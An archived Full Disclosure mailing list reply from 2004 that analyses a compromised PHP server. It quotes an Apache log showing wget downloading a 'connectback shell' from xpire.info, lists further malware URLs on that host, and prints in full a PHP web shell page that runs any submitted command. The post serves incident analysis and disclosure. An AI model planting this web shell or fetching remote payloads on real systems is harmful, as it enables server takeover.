Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: xpire.info & splitinfinity.info - exploits in the wild
From: "Elia Florio" <eflorio () edmaster it>
Date: Sun, 24 Oct 2004 21:06:51 +0200

I'm not sure that qmail-inject isn't a red herring?  The actual
download looks like 'wget' was used.
Good suggestion, my friend :)

It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.
After other analysis I've found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here the log trapped by Apache :

----------------------------------------------------------------------------
----
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........                                   100%   20.04
KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, it's possible to see that in my first showed log
the stdout
was in italian language (cause compromised server is .it), in this case is
in english language.
The hacker launched WGET command to retrieve his hacking tool in /tmp/a.out
In this log you can see also that the hacker also try to execute some "ls"
command,
as first trial to test vulnerability I suppose.
Moved by this, after other analysis I found that vulnerability used is an
obvious-but-effective PHP-Injection
using global variables (http://www.securityfocus.com/archive/1/218000 is a
good page to learn
something about this vuln).

The hacker page used to accomplish the injection are based on this
test-page, taken directly on the hacker-site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojan/backdoor/shell/worm/exploit and
other malware....why is it still open?

http://xpire.info/cli.gz            // connect back shell
http://xpire.info/fa/aga.exe    // agobot family
http://xpire.info/install.gz        // some trojan/malware ???? my NortonAV
does not catch it; it's a Windows-EXE

This is the sample of PHP-Injection page:
<?
$OS = system('uname -a');
$X = system('ls -la /usr/bin/X11/X');
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>
Using PHP "system" call, it possible to execute any remote command, like
WGET for example.
Anyone knows before this page???


I assume you used a bootable CD on the infected machine to do the
checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely,
using SSH, so I cannot use a bootable CD to connect at this remote host very
far from me :)
I'm limited in the analysis.....but the host is not mine!
However I think that md5um give me good results, because I compared all the
/usr/sbin directory
and all the checksum were good, except for /usr/sbin/crond......any ideas???
I used also "rpm -Vf" utility to cross check results, and were the same of
md5sum.

Check the httpd.conf (and other apache configuration files) for any
changes, and also the contents of each module loaded.  It's also
possilble, but less likely, that the injection is done in a kernel
module.
It's my fear :(((((((((( I studied all *.conf related to Apache/PHP modules
of this
machine, but nothing was found. A LKM injected could be the only response.

I also ran "chkrootkit" as someone suggest to me, but all the test give
positive answer
(no worm, no rootkit, no trojan)

Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity will begin :))))))

Thank you for the help, Kevin.

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]